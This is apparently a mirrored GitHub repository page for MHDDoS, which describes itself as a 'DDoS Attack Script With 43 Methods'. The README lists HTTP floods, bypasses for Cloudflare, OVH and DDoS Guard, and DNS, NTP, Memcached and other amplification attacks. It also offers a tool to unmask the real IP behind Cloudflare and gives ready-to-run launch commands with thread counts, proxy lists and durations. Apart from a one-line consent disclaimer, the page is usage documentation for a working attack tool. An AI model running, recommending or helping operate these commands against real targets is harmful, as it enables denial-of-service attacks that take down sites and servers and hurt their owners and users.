mirror of https://github.com/MatrixTM/MHDDoS.git
amazon-bypassattackauto-proxybypasscloudflarecloudflare-bypassddosddos-attack-scriptddos-attack-toolsddos-attacksddos-scriptddos-toolddosguard-bypassdosfloodhacking-toollayer4minecraftbotovh-bypass
|
|
||
|---|---|---|
| .github | ||
| files | ||
| .gitignore | ||
| Dockerfile | ||
| LICENSE | ||
| README.md | ||
| config.json | ||
| requirements.txt | ||
| start.py | ||
README.md

MHDDoS - DDoS Attack Script With 43 Methods
(Programming Language - Python 3)
Please Don't Attack websites without the owners consent.


Features And Methods
-
💣 Layer7
GET | GET Flood
POST | POST Flood
OVH | Bypass OVH
STRESS | Send HTTP Packet With High Byte
DYN | A New Method With Random SubDomain
SLOW | Slowloris Old Method of DDoS
HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD
NULL | Null UserAgent and ...
COOKIE | Random Cookie PHP 'if (isset($_COOKIE))'
PPS | Only 'GET / HTTP/1.1\r\n\r\n'
EVEN | GET Method with more headerGSB | Google Project Shield Bypass
DGB | DDoS Guard Bypass
AVB | Arvan Cloud Bypass
BOT | Like Google bot
APACHE | Apache Expliot
XMLRPC | WP XMLRPC expliot (add /xmlrpc.php)
CFB | CloudFlare Bypass
CFBUAM | CloudFlare Under Attack Mode BypassBYPASS | Bypass Normal AntiDDoS
BOMB | Bypass with codesenberg/bombardier
-
🧨 Layer4:
TCP | TCP Flood Bypass
UDP | UDP Flood Bypass
SYN | SYN Flood
VSE | Send VSE Protocol
MEM | Memcached Amplification
NTP | NTP Amplification
MINECRAFT | Minecraft Status Ping Protocol
DNS | DNS Amplification
CHAR | Chargen Amplification
ARD | Apple Remote Desktop Amplification
RDP | Remote Desktop Protocol Amplification
-
⚙️ Tools - Run With
python3 start.py tools- 🌟 CFIP | Find Real IP Address Of Websites Powered By Cloudflare
- 🔪 DNS | Show DNS Records Of Sites
- 📍 TSSRV | TeamSpeak SRV Resolver
- ⚠ PING | PING Servers
- 📌 CHECK | Check If Websites Status
- 😎 DSTAT | That Shows Bytes Received, bytes Sent and their amount
-
🎩 Other
- ❌ STOP | STOP All Attacks
- 🌠 TOOLS | Console Tools
- 👑 HELP | Show Usage Script
Issues ?
- Telegram : https://t.me/DD0SChat
- Discord : MH_ProDev#2681
- GitHub
Like the project? Leave a star on the repository!
Downloads
You can download it from GitHub Releases
Getting Started
Requirements
- cfscrape
- impacket
- requests
- Python3
- PyRoxy
- icmplib
- certifi
- psutil
- dnspython
- yarl
- bombardier (Optional, installation)
Videos
- Aparat: https://www.aparat.com/v/bHcP9
- YouTube : Coming soon...
Toturial
- Aprat : https://aparat.com/v/XPn5Z
- YouTube : https://youtu.be/mZilAOkLKK8
Clone and Install Script
git clone https://github.com/MHProDev/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt
Launch Script
- Proxy Types:
| Proxy Type | Value |
|---|---|
| All Proxy | 0 |
| HTTP | 1 |
| SOCKS4 | 4 |
| SOCKS5 | 5 |
| RANDOM | 6 |
- Layer7 (Website):
# Running bypass attack from 101 threads,
# with socks 5, 100 requests per proxy (connection), for 3600 seconds
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 proxy.txt 100 3600
- Layer4 (Server/Home):
# Running udp attack from 1 threads, for 3600 seconds
python start.py udp 1.1.1.1:53 1 3600
# Running dns attack from 100 threads, for 3600 seconds
# with reflector servers from dns.txt, for 3600 seconds
python start.py dns 1.1.1.1:53 100 3600 dns.txt
# Running dns attack from 1000 threads
# with socks 5, for 3600 seconds
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
- Debug Mode (Log Attack status):
python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true
- Tools/Help:
python start.py tools
python start.py help
💰 Donation Links: